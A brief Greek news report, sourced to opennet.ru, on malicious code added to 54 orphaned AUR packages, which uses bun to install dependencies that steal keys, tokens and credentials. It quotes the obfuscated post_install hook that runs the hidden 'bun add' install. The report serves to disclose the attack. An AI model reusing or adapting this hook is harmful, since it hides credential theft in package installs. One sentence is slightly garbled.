Παρά τα μέτρα που έλαβαν οι προγραμματιστές του Arch Linux, η δραστηριότητα εισαγωγής κακόβουλου κώδικα στο αποθετήριο AUR (Arch User Repository) δεν έχει σταματήσει. Πριν από λίγες ώρες, κακόβουλος κώδικας εισήχθη σε άλλα 54 πακέτα που έμειναν χωρίς διαχειριστές (το ιστορικό κακόβουλων τροποποιήσεων έχει αναστραφεί). Σε αντίθεση με τις επιθέσεις προχθές, αυτή τη φορά, αντί για τον διαχειριστή πακέτων npm, χρησιμοποιείται η πλατφόρμα bun για την εγκατάσταση κακόβουλων εξαρτήσεων. Για να παρακαμφθούν τα εφαρμοσμένα φίλτρα, εισάγεται μια κρυφή συμβολοσειρά στη συνάρτηση post_install, καλώντας την εντολή "bun add" για την εγκατάσταση πακέτων με κακόβουλο κώδικα που τα σαρώνει και τα στέλνει σε έναν εξωτερικό διακομιστή. διακομιστή κλειδιά, διακριτικά και διαπιστευτήρια.
post_install() {
$'\x63′"d" "/"'t'"m"'p' && "b"u"n' 'a'"d"'d' $'\141\x6e"s'"i""-"$'\143"o"l"o"r'$'\x73′ 'n'"e"'x'"t""f"'i"l"e"-"j"s'
}
Πηγή: opennet.ru
